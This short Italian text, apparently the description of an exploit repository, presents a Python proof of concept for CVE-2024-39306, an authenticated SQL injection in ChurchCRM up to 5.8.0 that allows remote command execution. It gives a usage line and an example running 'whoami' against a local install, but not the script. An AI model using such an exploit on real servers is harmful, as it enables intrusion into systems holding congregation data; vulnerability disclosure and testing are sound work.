
Exploit proof-of-concept per CVE-2024-39306, una vulnerabilità di SQL injection in ChurchCRM <= 5.8.0 che consente l'esecuzione remota di codice autenticata. Fornisce uno script Python per eseguire comandi arbitrari sul server.
Questo script è un PoC per CVE-2024-39306, dove è possibile un RCE a causa di una SQL injection tramite cui un utente autenticato può eseguire comandi arbitrari su un server che esegue ChurchCRM <= 5.8.0
python3 CVE-2024-39306.py -u <USERNAME> -p <PASSWORD> -b <URL> -c <COMMAND>
Esempio: python3 CVE-2024-39306.py -u FirstLast -p Password123 -b http://localhost/churchcrm -c whoami